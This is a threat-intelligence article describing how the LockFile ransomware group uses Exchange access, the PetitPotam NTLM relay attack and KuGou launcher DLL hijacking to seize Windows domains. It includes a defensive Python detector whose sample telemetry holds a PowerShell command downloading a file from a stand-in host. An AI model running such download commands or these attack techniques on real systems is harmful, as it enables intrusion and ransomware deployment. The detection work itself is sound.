LockFile Uses PetitPotam Attack to Target Domain Controllers

LockFile, a new ransomware group, has been observed using the PetitPotam NTLM relay attack. PetitPotam, disclosed last month, enables threat actors to take over a Windows domain completely. The LockFile ransomware group first appeared in July.

What has happened

LockFile attacks have been targeting victims mostly based in the U.S. and Asia, including several organizations in different sectors such as financial, business services, manufacturing, legal, engineering, travel, and tourism.
  • According to researchers, the attackers gained initial access to the network by abusing Exchange servers. However, researchers were not able to confirm the exact method.
  • The attackers then gained control over the organization’s domain controller by abusing the PetitPotam method. This method forces authentication to a remote NTLM relay under the control of LockFile.
  • The LockFile ransomware gang is using publicly available code to take advantage of the original PetitPotam variant, which is tracked as CVE-2021-36942.
  • After the attackers successfully gain full control over the targeted domain controller, they take control over the whole Windows domain.
  • Moreover, researchers found that the LockFile ransom note looks similar to that of the LockBit ransomware group. In addition, LockFile’s contact email address references the Conti group.

The attack chain

Symantec investigated LockFile’s attack chain and disclosed that the attackers are usually spending several days on compromised networks before executing the ransomware.
  • While compromising the Exchange server, the attacker runs a PowerShell command to download a file from a remote location.
  • The ransomware is dropped roughly 20–30 minutes later.
  • The group gains control over the domain by installing the PetitPotam exploit via two files: active_desktop_render[.]dll and active_desktop_launcher[.]exe.
  • One of the files is a genuine KuGou Active Desktop launcher, which is abused for DLL hijacking so that it loads the malicious DLL. This helps the attackers evade detection by security solutions.
  • The DLL attempts to load and decrypt desktop[.]ini, which contains shellcode; finally, the ransomware payload is copied to the local domain controller and spread across the network using a script and an executable file.
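The attack chain above can be turned into a host-level detection. The following is an added example, not code from the article or from Symantec: it correlates per-host process and image-load events and flags the sequence PowerShell download, then execution of the KuGou launcher within a time window, then that launcher loading active_desktop_render.dll from its own directory. The event schema, host names, paths and the 60-minute window are assumptions; only the two file names come from the article, and the sample telemetry is constructed.

```python
from collections import defaultdict
from datetime import datetime, timedelta

LAUNCHER, HIJACKED_DLL = "active_desktop_launcher.exe", "active_desktop_render.dll"  # names from the article
DOWNLOAD_TOKENS = ("downloadfile", "downloadstring", "invoke-webrequest")  # assumed download indicators

def _split(path):  # Windows path -> (directory, file name), both lower-cased
    return tuple(path.replace("/", "\\").lower().rpartition("\\")[::2])

def detect_lockfile_chain(events, window=timedelta(minutes=60)):
    """Per host, ordered stages seen: 'download' -> 'launcher' (within window) -> 'dll_hijack'."""
    by_host = defaultdict(list)
    for ev in events: by_host[ev["host"]].append(ev)
    result = {}
    for host, evs in by_host.items():
        stages, download_ts, launcher_dir = [], None, None
        for ev in sorted(evs, key=lambda e: e["ts"]):
            ts = datetime.fromisoformat(ev["ts"])
            img_dir, img = _split(ev["image"])
            detail = ev.get("detail", "")
            if ev["type"] == "process" and img == "powershell.exe" \
                    and any(t in detail.lower() for t in DOWNLOAD_TOKENS):
                download_ts, stages = ts, ["download"]          # stage 1: PowerShell fetches a file
            elif ev["type"] == "process" and img == LAUNCHER \
                    and download_ts and ts - download_ts <= window:
                launcher_dir, stages = img_dir, stages + ["launcher"]  # stage 2: launcher runs soon after
            elif ev["type"] == "imageload" and img == LAUNCHER \
                    and launcher_dir and _split(detail) == (launcher_dir, HIJACKED_DLL):
                stages.append("dll_hijack")                     # stage 3: side-loaded DLL next to launcher
        result[host] = stages
    return result

def chain_hosts(events):
    """Hosts where the full download -> launcher -> DLL hijack sequence occurred."""
    return sorted(h for h, s in detect_lockfile_chain(events).items()
                  if {"download", "launcher", "dll_hijack"} <= set(s))

SAMPLE_EVENTS = [  # constructed telemetry: a DC showing the chain, and a clean workstation
    {"ts": "2021-08-20T09:00:00", "host": "DC01", "type": "process",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "detail": r"powershell.exe -c (New-Object Net.WebClient).DownloadFile('hxxp://placeholder.invalid/p','C:\Users\Public\p')"},
    {"ts": "2021-08-20T09:25:00", "host": "DC01", "type": "process",
     "image": r"C:\Users\Public\active_desktop_launcher.exe"},
    {"ts": "2021-08-20T09:25:01", "host": "DC01", "type": "imageload",
     "image": r"C:\Users\Public\active_desktop_launcher.exe",
     "detail": r"C:\Users\Public\active_desktop_render.dll"},
    {"ts": "2021-08-20T09:30:00", "host": "WS07", "type": "process",
     "image": r"C:\Program Files\KuGou\active_desktop_launcher.exe"},
    {"ts": "2021-08-20T09:30:01", "host": "WS07", "type": "imageload",
     "image": r"C:\Program Files\KuGou\active_desktop_launcher.exe",
     "detail": r"C:\Program Files\KuGou\active_desktop_render.dll"},
]
```

Running `chain_hosts(SAMPLE_EVENTS)` returns `['DC01']`: the workstation running the same launcher without a preceding PowerShell download does not match, which keeps a legitimate KuGou install from firing the rule.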

Conclusion

LockFile operators have been actively targeting organizations around the world. Moreover, the adoption of the recently disclosed PetitPotam attack into their campaign indicates that they are actively investing in enhancing their tooling. Therefore, it is crucial for security professionals to keep an eye on this evolving threat.

Cyware Publisher
